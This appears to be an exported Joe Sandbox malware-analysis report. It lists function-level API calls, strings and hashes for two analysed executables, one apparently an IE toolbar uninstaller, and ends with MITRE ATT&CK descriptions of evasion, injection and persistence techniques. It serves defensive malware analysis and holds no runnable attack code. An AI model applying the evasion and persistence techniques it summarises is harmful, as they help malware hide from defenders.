Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 57607852ce15da45032583eecf595b266eb818b51a75700467a9fc2c410260bf
Instruction ID: 86a4b35954e85bb75ec39e114bccfc50e282ec3ca0152174d73c8df7cd9b4be4
Opcode Fuzzy Hash: 57607852ce15da45032583eecf595b266eb818b51a75700467a9fc2c410260bf
Instruction Fuzzy Hash: ADF07FB4615B4481FB078FA7B84479422E5EB4DBC0F481028AB494B3B0DF7A80998710

Analysis Process: Twhtlb.exePID: 3744, Parent PID: 6196COMMON

Executed Functions

Function 0526017F Relevance: 2.8, APIs: 2, Instructions: 267memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 052601DF

Memory Dump Source

Source File: 00000028.00000003.3638007229.0000000005260000.00000040.00001000.00020000.00000000.sdmp, Offset: 05260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_3_5260000_Twhtlb.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 173a0753eb1870a11fb702d1a013be029f39be02b255bbe32865f3a9974466fd
Instruction ID: a2d83aafe109922ed99a7747f2a76f51660ddcd7ca90d15e55f0ea5f37318349
Opcode Fuzzy Hash: 173a0753eb1870a11fb702d1a013be029f39be02b255bbe32865f3a9974466fd
Instruction Fuzzy Hash: 66A16070A10606EFDB28CFA9C884ABDB7B5FF48305F148169E41AD7351D770EA91DB90

Function 0526044B Relevance: 2.6, APIs: 2, Instructions: 75memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0526048B
VirtualFree.KERNELBASE(?,?,00004000), ref: 052604F1

Memory Dump Source

Source File: 00000028.00000003.3638007229.0000000005260000.00000040.00001000.00020000.00000000.sdmp, Offset: 05260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_3_5260000_Twhtlb.jbxd

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: 85e613f023628dd9a35c971c8f35ac366b6d7af4f068bcc7d0f9ba1c9b2aec73
Instruction ID: 73bd720a7c502b7f6016179dc2b6a2d2915784a19398d009608401892778c798
Opcode Fuzzy Hash: 85e613f023628dd9a35c971c8f35ac366b6d7af4f068bcc7d0f9ba1c9b2aec73
Instruction Fuzzy Hash: 1621D875A14306ABDB309EA48C88FAFB7F9FF44214F104468EA5EA2281D671A944A660

Non-executed Functions

Function 05260643 Relevance: 2.6, Strings: 2, Instructions: 55COMMON

Download Yara Rule

Strings

ntdl, xrefs: 05260684
l, xrefs: 0526068E

Memory Dump Source

Source File: 00000028.00000003.3638007229.0000000005260000.00000040.00001000.00020000.00000000.sdmp, Offset: 05260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_40_3_5260000_Twhtlb.jbxd

Similarity

API ID:
String ID: l$ntdl
API String ID: 0-924918826
Opcode ID: 0c2c30aec7a625bf31c8c356953fe1e8142b6a83dabfcff9fbbd6bac14ed309e
Instruction ID: 0de9afb403acaa6c4d3c0b49d8a5c33d46152b410ffae50c74b4760b6808bbd4
Opcode Fuzzy Hash: 0c2c30aec7a625bf31c8c356953fe1e8142b6a83dabfcff9fbbd6bac14ed309e
Instruction Fuzzy Hash: 8C018471B10214AFCB04DF99C849DAEFBB9FF88654F044099F904A7360DB70DE409BA5

Analysis Process: 6WWeC.exePID: 1124, Parent PID: 1064COMMON

Execution Graph

Execution Coverage:	6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	1.3%
Total number of Nodes:	1048
Total number of Limit Nodes:	29

Executed Functions

Function 00521000 Relevance: 29.8, APIs: 13, Strings: 4, Instructions: 73
libraryloadersynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoInitialize.OLE32(00000000), ref: 00521006
CreateMutexW.KERNELBASE(00000000,00000000,Global\IEToolbarUninstaller), ref: 00521013
GetLastError.KERNEL32 ref: 0052101F
GetCommandLineW.KERNEL32(?), ref: 00521040
CommandLineToArgvW.SHELL32(00000000), ref: 00521047
PathFileExistsW.KERNELBASE(tbcore3.dll), ref: 00521061
PathFileExistsW.KERNELBASE(tbcore3U.dll), ref: 00521073
LoadLibraryW.KERNELBASE(?), ref: 00521085
GetProcAddress.KERNEL32(00000000,MyUnregisterServer), ref: 00521097
FreeLibrary.KERNELBASE(00000000), ref: 005210A4
CloseHandle.KERNELBASE(00000000), ref: 005210AB
CoUninitialize.COMBASE ref: 005210B1
LocalFree.KERNEL32(00000000), ref: 005210BC

Strings

MyUnregisterServer, xrefs: 00521091
tbcore3U.dll, xrefs: 0052106E, 00521079
tbcore3.dll, xrefs: 0052105C, 00521067
Global\IEToolbarUninstaller, xrefs: 0052100C

Memory Dump Source

Source File: 0000002A.00000002.3651176006.0000000000521000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00520000, based on PE: true

Associated: 0000002A.00000002.3651144498.0000000000520000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000002A.00000002.3651204621.0000000000528000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000002A.00000002.3651231773.000000000052A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000002A.00000002.3651262685.000000000052C000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_520000_6WWeC.jbxd

Similarity

API ID: CommandExistsFileFreeLibraryLinePath$AddressArgvCloseCreateErrorHandleInitializeLastLoadLocalMutexProcUninitialize
String ID: Global\IEToolbarUninstaller$MyUnregisterServer$tbcore3.dll$tbcore3U.dll
API String ID: 474438367-4110843154
Opcode ID: 326963372ed93872c45df544f5ade9ba55fc37e612079f5cc793b74344096cf8
Instruction ID: 942c908e7fb72191b3f3ffe1d038cce1cee15c6192342eb59beb1abc1a978bd2
Opcode Fuzzy Hash: 326963372ed93872c45df544f5ade9ba55fc37e612079f5cc793b74344096cf8
Instruction Fuzzy Hash: AB11D232506A75EB83309BA0BC0CA6F3E98BE77751B000915F542D21D0DF20984AE7B9

Function 00521465 Relevance: 3.0, APIs: 2, Instructions: 8
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

___crtCorExitProcess.LIBCMT ref: 0052146D

Part of subcall function 0052143A: GetModuleHandleW.KERNEL32(mscoree.dll,?,00521472,?,?,005254EE,000000FF,0000001E,?,005236FC,?,00000001,?,?,00522A2A,00000018), ref: 00521444
Part of subcall function 0052143A: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00521454

ExitProcess.KERNEL32 ref: 00521476

Memory Dump Source

Source File: 0000002A.00000002.3651176006.0000000000521000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00520000, based on PE: true

Associated: 0000002A.00000002.3651144498.0000000000520000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000002A.00000002.3651204621.0000000000528000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000002A.00000002.3651231773.000000000052A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000002A.00000002.3651262685.000000000052C000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_520000_6WWeC.jbxd

Similarity

API ID: ExitProcess$AddressHandleModuleProc___crt
String ID:
API String ID: 2427264223-0
Opcode ID: c2f7e88e0337a93cbda190074a0c97d252aa7fe54ded05569c29d36c851e0302
Instruction ID: 7d15b3dac179b583afb3bc704629b05945bb48f337c2686eb5660a63b6e54a4c
Opcode Fuzzy Hash: c2f7e88e0337a93cbda190074a0c97d252aa7fe54ded05569c29d36c851e0302
Instruction Fuzzy Hash: 8DB04831000108BB9B162B52EC0E95A3F2AFE923A0B608021F808490619E72A99AAA94

Function 0052261B Relevance: 1.5, APIs: 1, Instructions: 20
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 00522630

Memory Dump Source

Source File: 0000002A.00000002.3651176006.0000000000521000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00520000, based on PE: true

Associated: 0000002A.00000002.3651144498.0000000000520000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000002A.00000002.3651204621.0000000000528000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000002A.00000002.3651231773.000000000052A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000002A.00000002.3651262685.000000000052C000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_520000_6WWeC.jbxd

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 4b6609bff68e0d3c7c9b96a6d3ca35f91c8152f40eda862763eb700c8dd9363c
Instruction ID: e551f8225467f7f8301666e4a2d474a87658f013a6261d720eaf7082ef5265a7
Opcode Fuzzy Hash: 4b6609bff68e0d3c7c9b96a6d3ca35f91c8152f40eda862763eb700c8dd9363c
Instruction Fuzzy Hash: 01D097325403046EEB205FB07C487323BDCDB81394F004031B80CC61A0FA30D58AEA00

Function 00521681 Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_doexit.LIBCMT ref: 0052168D

Part of subcall function 00521555: __lock.LIBCMT ref: 00521563
Part of subcall function 00521555: __decode_pointer.LIBCMT ref: 0052159A
Part of subcall function 00521555: __decode_pointer.LIBCMT ref: 005215AF
Part of subcall function 00521555: __decode_pointer.LIBCMT ref: 005215D9
Part of subcall function 00521555: __decode_pointer.LIBCMT ref: 005215EF
Part of subcall function 00521555: __decode_pointer.LIBCMT ref: 005215FC
Part of subcall function 00521555: __initterm.LIBCMT ref: 0052162B
Part of subcall function 00521555: __initterm.LIBCMT ref: 0052163B

Memory Dump Source

Source File: 0000002A.00000002.3651176006.0000000000521000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00520000, based on PE: true

Associated: 0000002A.00000002.3651144498.0000000000520000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000002A.00000002.3651204621.0000000000528000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000002A.00000002.3651231773.000000000052A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000002A.00000002.3651262685.000000000052C000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_520000_6WWeC.jbxd

Similarity

API ID: __decode_pointer$__initterm$__lock_doexit
String ID:
API String ID: 1597249276-0
Opcode ID: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
Instruction ID: 0b8fb0a2f744a60dbebed121ff6820c9db863bf3ede462ff3fedc7e060ced9c5
Opcode Fuzzy Hash: 02276376eab60fb44a6de362a8cb41930a671a9c3f5feaa45b9c6d7d217bd1ad
Instruction Fuzzy Hash: C4B0923268020833DB202586AC07F063E099BD1BA0E250060FA0C191E1A9A2A961848A

Non-executed Functions

Function 005210CC Relevance: 7.6, APIs: 5, Instructions: 58
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

IsDebuggerPresent.KERNEL32 ref: 00521346
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0052135B
UnhandledExceptionFilter.KERNEL32(0052816C), ref: 00521366
GetCurrentProcess.KERNEL32(C0000409), ref: 00521382
TerminateProcess.KERNEL32(00000000), ref: 00521389

Memory Dump Source

Source File: 0000002A.00000002.3651176006.0000000000521000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00520000, based on PE: true

Associated: 0000002A.00000002.3651144498.0000000000520000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000002A.00000002.3651204621.0000000000528000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000002A.00000002.3651231773.000000000052A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000002A.00000002.3651262685.000000000052C000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_520000_6WWeC.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 124cb3a2253074296656943a4d5fa645bee9952b8d8c2ad055c5ea0b8c5c4272
Instruction ID: f7b185eb7415afe67b3561c4999b9e2500f723a683a962ce5284a8b5dc826ca1
Opcode Fuzzy Hash: 124cb3a2253074296656943a4d5fa645bee9952b8d8c2ad055c5ea0b8c5c4272
Instruction Fuzzy Hash: E321C0B4401204DFC730DF64FD486543BB0BF7A352F40441AE50896AA1EBB4598EEF46

Function 005221E5 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 57
libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,00529458,0000000C,00522320,00000000,00000000,?,0052174F,00000003,?,?,?,?,?,?,005210F6), ref: 005221F7
__crt_waiting_on_module_handle.LIBCMT ref: 00522202

Part of subcall function 005213E1: Sleep.KERNEL32(000003E8,00000000,?,00522148,KERNEL32.DLL,?,00522194,?,0052174F,00000003), ref: 005213ED
Part of subcall function 005213E1: GetModuleHandleW.KERNEL32(?,?,00522148,KERNEL32.DLL,?,00522194,?,0052174F,00000003,?,?,?,?,?,?,005210F6), ref: 005213F6

GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 0052222B
GetProcAddress.KERNEL32(?,DecodePointer), ref: 0052223B
__lock.LIBCMT ref: 0052225D
InterlockedIncrement.KERNEL32(0052A4D8), ref: 0052226A
__lock.LIBCMT ref: 0052227E
___addlocaleref.LIBCMT ref: 0052229C

Strings

EncodePointer, xrefs: 0052221F
KERNEL32.DLL, xrefs: 005221F1, 005221F6, 00522201
DecodePointer, xrefs: 00522233

Memory Dump Source

Source File: 0000002A.00000002.3651176006.0000000000521000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00520000, based on PE: true

Associated: 0000002A.00000002.3651144498.0000000000520000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000002A.00000002.3651204621.0000000000528000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000002A.00000002.3651231773.000000000052A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000002A.00000002.3651262685.000000000052C000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_520000_6WWeC.jbxd

Similarity

API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
String ID: DecodePointer$EncodePointer$KERNEL32.DLL
API String ID: 1028249917-2843748187
Opcode ID: 88ca8f35fcf584ff5609a6f61fe02c7c5b1e45beb6ae20f119cd119e8ca5d249
Instruction ID: 585bbe31674c47d3f134875ee232f8f9436feb04c62a23b674d227362160da52
Opcode Fuzzy Hash: 88ca8f35fcf584ff5609a6f61fe02c7c5b1e45beb6ae20f119cd119e8ca5d249
Instruction Fuzzy Hash: 4A110575801711EFD720EFB5F849B5ABFE0BF66310F104419E499932E0CB70A905CB24

Function 005240A0 Relevance: 7.5, APIs: 5, Instructions: 47
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__getptd.LIBCMT ref: 005240AC

Part of subcall function 00522345: __getptd_noexit.LIBCMT ref: 00522348
Part of subcall function 00522345: __amsg_exit.LIBCMT ref: 00522355

__amsg_exit.LIBCMT ref: 005240CC
__lock.LIBCMT ref: 005240DC
InterlockedDecrement.KERNEL32(?), ref: 005240F9
InterlockedIncrement.KERNEL32(02612B98), ref: 00524124

Memory Dump Source

Source File: 0000002A.00000002.3651176006.0000000000521000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00520000, based on PE: true

Associated: 0000002A.00000002.3651144498.0000000000520000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000002A.00000002.3651204621.0000000000528000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000002A.00000002.3651231773.000000000052A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000002A.00000002.3651262685.000000000052C000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_520000_6WWeC.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
String ID:
API String ID: 4271482742-0
Opcode ID: 7bc29f8b56881866da83fe5638528260a49ef367cf103777b1abeea050427959
Instruction ID: ff8ea031daf7d303b3db74c8fbf25aa7cd464533700557058a8598f74a4c1f61
Opcode Fuzzy Hash: 7bc29f8b56881866da83fe5638528260a49ef367cf103777b1abeea050427959
Instruction Fuzzy Hash: 0201E136901632E7CB25AF65B40A35D7F60BF63710F004004F900AB2D1CB346996DFD2

Function 005235EE Relevance: 7.5, APIs: 5, Instructions: 44
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__lock.LIBCMT ref: 0052360C

Part of subcall function 00522AA0: __mtinitlocknum.LIBCMT ref: 00522AB6
Part of subcall function 00522AA0: __amsg_exit.LIBCMT ref: 00522AC2
Part of subcall function 00522AA0: EnterCriticalSection.KERNEL32(?,?,?,00525600,00000004,00529628,0000000C,00523746,?,?,00000000,00000000,00000000,?,005222F7,00000001), ref: 00522ACA

___sbh_find_block.LIBCMT ref: 00523617
___sbh_free_block.LIBCMT ref: 00523626
HeapFree.KERNEL32(00000000,?,00529568,0000000C,00522A81,00000000,005294C8,0000000C,00522ABB,?,?,?,00525600,00000004,00529628,0000000C), ref: 00523656
GetLastError.KERNEL32(?,00525600,00000004,00529628,0000000C,00523746,?,?,00000000,00000000,00000000,?,005222F7,00000001,00000214), ref: 00523667

Memory Dump Source

Source File: 0000002A.00000002.3651176006.0000000000521000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00520000, based on PE: true

Associated: 0000002A.00000002.3651144498.0000000000520000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000002A.00000002.3651204621.0000000000528000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000002A.00000002.3651231773.000000000052A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000002A.00000002.3651262685.000000000052C000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_520000_6WWeC.jbxd

Similarity

API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2714421763-0
Opcode ID: c101eef4cea032c363b44ec128d434b127f07bbf9b9513b6b5b3391863f9d425
Instruction ID: dd016090a0fc12ee7d3dea81afded4f07daee0792afd9a2cf8b8ae5bd47228ed
Opcode Fuzzy Hash: c101eef4cea032c363b44ec128d434b127f07bbf9b9513b6b5b3391863f9d425
Instruction Fuzzy Hash: 84018F35D05326BADB306BB0BC0EB5E3E68BF53720F604009F100662D1CF38AA44DA58

Function 00523E04 Relevance: 6.0, APIs: 4, Instructions: 31
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__getptd.LIBCMT ref: 00523E10

Part of subcall function 00522345: __getptd_noexit.LIBCMT ref: 00522348
Part of subcall function 00522345: __amsg_exit.LIBCMT ref: 00522355

__getptd.LIBCMT ref: 00523E27
__amsg_exit.LIBCMT ref: 00523E35
__lock.LIBCMT ref: 00523E45

Memory Dump Source

Source File: 0000002A.00000002.3651176006.0000000000521000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00520000, based on PE: true

Associated: 0000002A.00000002.3651144498.0000000000520000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000002A.00000002.3651204621.0000000000528000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000002A.00000002.3651231773.000000000052A000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000002A.00000002.3651262685.000000000052C000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_42_2_520000_6WWeC.jbxd

Similarity

API ID: __amsg_exit__getptd$__getptd_noexit__lock
String ID:
API String ID: 3521780317-0
Opcode ID: 6db29e74f58c190f5ffd50dd11499b0b6fdf30026ade0d060f240f95f90e6dd8
Instruction ID: 00e3aa9cbbf24f41b93e2456368aa404a02ce44f877821177c9948f063c21770
Opcode Fuzzy Hash: 6db29e74f58c190f5ffd50dd11499b0b6fdf30026ade0d060f240f95f90e6dd8
Instruction Fuzzy Hash: 3AF06D36A007329BD720FB74B40A74D7BA4BF96B10F114559A441972E1CF789A46CA52

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

